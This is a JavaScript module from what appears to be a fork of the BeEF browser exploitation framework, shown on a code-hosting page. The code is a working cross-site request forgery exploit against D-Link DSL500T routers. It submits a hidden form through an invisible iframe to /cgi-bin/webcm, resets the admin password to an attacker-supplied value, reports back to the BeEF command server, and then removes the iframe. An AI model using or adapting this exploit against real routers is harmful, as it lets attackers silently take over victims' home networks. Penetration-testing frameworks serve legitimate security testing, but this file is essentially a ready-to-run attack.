Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2c19a3a8d8dde58fe14ca2406bbaba3d5b0beb9d
beef/modules/router/dlink_dsl500t_csrf/command.js
bcoles 0485a1ab7e Added 3x router CSRF exploits: 
o Comtrend CT5367
o Comtrend CT5624
o D-Link DSL500T
2012-03-04 14:55:00 +10:30

72 lines
2.3 KiB
JavaScript
Raw Blame History

//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var gateway = '<%= @base %>';
var passwd = '<%= @password %>';
var target = gateway + "/cgi-bin/webcm";
var dsl500t_iframe = beef.dom.createInvisibleIframe();
var form = document.createElement('form');
form.setAttribute('action', target);
form.setAttribute('method', 'post');
var input = null;
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'getpage');
input.setAttribute('value', '../html/tools/usrmgmt.htm');
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'security:settings/username');
input.setAttribute('value', 'admin');
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'security:settings/password');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'security:settings/password_confirm');
input.setAttribute('value', passwd);
form.appendChild(input);
input = document.createElement('input');
input.setAttribute('type', 'hidden');
input.setAttribute('name', 'security:settings/idle_timeout');
input.setAttribute('value', '30');
form.appendChild(input);
dsl500t_iframe.contentWindow.document.body.appendChild(form);
form.submit();
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
cleanup = function() {
document.body.removeChild(dsl500t_iframe);
}
setTimeout("cleanup()", 15000);
});
Reference in New Issue View Git Blame Copy Permalink